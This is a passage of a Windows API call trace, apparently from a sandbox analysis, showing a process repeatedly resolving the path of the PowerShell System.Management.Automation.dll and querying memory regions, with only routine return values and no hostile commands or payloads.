	[0062.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.686] GetLastError () returned 0x0
	[0062.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.686] GetLastError () returned 0x0
	[0062.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.686] GetLastError () returned 0x0
	[0062.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.686] GetLastError () returned 0x0
	[0062.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.686] GetLastError () returned 0x0
	[0062.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.686] GetLastError () returned 0x0
	[0062.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.686] GetLastError () returned 0x0
	[0062.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.686] GetLastError () returned 0x0
	[0062.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.686] GetLastError () returned 0x0
	[0062.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.686] GetLastError () returned 0x0
	[0062.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.687] GetLastError () returned 0x0
	[0062.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.687] GetLastError () returned 0x0
	[0062.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.687] GetLastError () returned 0x0
	[0062.687] VirtualQuery (in: lpAddress=0xacf84, lpBuffer=0xadf84, dwLength=0x1c | out: lpBuffer=0xadf84*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.687] GetLastError () returned 0x0
	[0062.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.687] GetLastError () returned 0x0
	[0062.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.687] GetLastError () returned 0x0
	[0062.688] VirtualQuery (in: lpAddress=0xacf84, lpBuffer=0xadf84, dwLength=0x1c | out: lpBuffer=0xadf84*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.688] VirtualQuery (in: lpAddress=0xacfc0, lpBuffer=0xadfc0, dwLength=0x1c | out: lpBuffer=0xadfc0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.688] GetLastError () returned 0x0
	[0062.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.688] GetLastError () returned 0x0
	[0062.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.688] GetLastError () returned 0x0
	[0062.688] VirtualQuery (in: lpAddress=0xacf84, lpBuffer=0xadf84, dwLength=0x1c | out: lpBuffer=0xadf84*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.688] VirtualQuery (in: lpAddress=0xacfc0, lpBuffer=0xadfc0, dwLength=0x1c | out: lpBuffer=0xadfc0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.688] GetLastError () returned 0x0
	[0062.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.689] GetLastError () returned 0x0
	[0062.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.689] GetLastError () returned 0x0
	[0062.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.689] GetLastError () returned 0x0
	[0062.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.689] GetLastError () returned 0x0
	[0062.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.689] GetLastError () returned 0x0
	[0062.689] VirtualQuery (in: lpAddress=0xacf84, lpBuffer=0xadf84, dwLength=0x1c | out: lpBuffer=0xadf84*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.689] VirtualQuery (in: lpAddress=0xacfc0, lpBuffer=0xadfc0, dwLength=0x1c | out: lpBuffer=0xadfc0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.690] GetLastError () returned 0x0
	[0062.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.690] GetLastError () returned 0x0
	[0062.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.690] GetLastError () returned 0x0
	[0062.690] VirtualQuery (in: lpAddress=0xacf84, lpBuffer=0xadf84, dwLength=0x1c | out: lpBuffer=0xadf84*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.690] VirtualQuery (in: lpAddress=0xacfc0, lpBuffer=0xadfc0, dwLength=0x1c | out: lpBuffer=0xadfc0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.691] GetLastError () returned 0x0
	[0062.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.691] GetLastError () returned 0x0
	[0062.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.691] GetLastError () returned 0x0
	[0062.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.691] GetLastError () returned 0x0
	[0062.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.691] GetLastError () returned 0x0
	[0062.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.691] GetLastError () returned 0x0
	[0062.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.691] GetLastError () returned 0x0
	[0062.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.691] GetLastError () returned 0x0
	[0062.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.692] GetLastError () returned 0x0
	[0062.692] VirtualQuery (in: lpAddress=0xacf84, lpBuffer=0xadf84, dwLength=0x1c | out: lpBuffer=0xadf84*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.692] VirtualQuery (in: lpAddress=0xacfc0, lpBuffer=0xadfc0, dwLength=0x1c | out: lpBuffer=0xadfc0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.692] GetLastError () returned 0x0
	[0062.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.692] GetLastError () returned 0x0
	[0062.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.692] GetLastError () returned 0x0
	[0062.693] VirtualQuery (in: lpAddress=0xacf84, lpBuffer=0xadf84, dwLength=0x1c | out: lpBuffer=0xadf84*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.693] VirtualQuery (in: lpAddress=0xacfc0, lpBuffer=0xadfc0, dwLength=0x1c | out: lpBuffer=0xadfc0*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.693] GetLastError () returned 0x0
	[0062.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.693] GetLastError () returned 0x0
	[0062.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad928, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.693] GetLastError () returned 0x0
	[0062.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.693] GetLastError () returned 0x0
	[0062.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.693] GetLastError () returned 0x0
	[0062.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.693] GetLastError () returned 0x0
	[0062.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.693] GetLastError () returned 0x0
	[0062.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.694] GetLastError () returned 0x0
	[0062.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.694] GetLastError () returned 0x0
	[0062.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.694] GetLastError () returned 0x0
	[0062.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.694] GetLastError () returned 0x0
	[0062.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.694] GetLastError () returned 0x0
	[0062.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.694] GetLastError () returned 0x0
	[0062.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.694] GetLastError () returned 0x0
